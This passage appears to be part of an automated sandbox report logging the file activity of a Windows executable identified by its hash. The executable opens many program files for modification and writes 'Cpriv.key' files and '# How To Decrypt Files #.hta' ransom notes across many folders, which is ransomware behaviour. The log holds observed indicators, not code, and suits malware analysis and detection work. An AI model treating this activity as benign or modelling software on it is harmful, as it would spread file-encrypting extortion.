Files\Microsoft Office\Office14\PAGESIZE\PGLBL075.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01167_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01268_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\RPLBRF35.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_flyout.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00129_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02045_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18205_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME46.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1036\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureB.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Internet Explorer\images\bing.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Bibliography\Sort\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\GRAPH.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\2052\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.smil_1.0.0.v200806040011.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmti.h de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107496.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OSPP.HTM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableUpArrow.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Tiki.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\AFTRNOON\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200151.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099189.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\resources.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152688.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE04050_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\af\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ECHO\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Bears.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\MENU98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_settings.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Groove.en-us de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Network Sharing\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_windy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\bdcmetadataresource.xsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN058.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\nacl_irt_x86_64.nexe de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04369_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME16.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR2F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_left_over.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\ta.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-next-static.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105384.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105846.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Bibliography\Style\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_italic.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\DW\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Earthy.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBHD.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\VC\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0158071.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BZCD98SP.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\lua\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Technic.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101859.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14757_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\menu_arrow.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_choosecolor.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ja.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-javahelp.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01126_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\background.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-templates.xml_hidden de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME42.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\messageboxinfo.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Photo Viewer\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\ado\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansRegular.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\highDpiImageSwap.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\ACCESS12.ACC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\STORYVERTBB.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\layers.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsImageTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipsesp.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02092_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIconMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SECRECL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\COUGH.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Teal.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\WEBEMAIL.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Pushpin.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086384.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0282126.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00523_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGPQUOT.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\VGX\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\clock.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297757.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSACCESS.DEV_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_OffMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\AppInfoDocument\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunjce_provider.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_docked.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10302_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21328_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BZCARD11.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_scene.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Austin.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\CASCADE\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0318804.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18194_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ADD.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16\# How To Decrypt Files #.hta 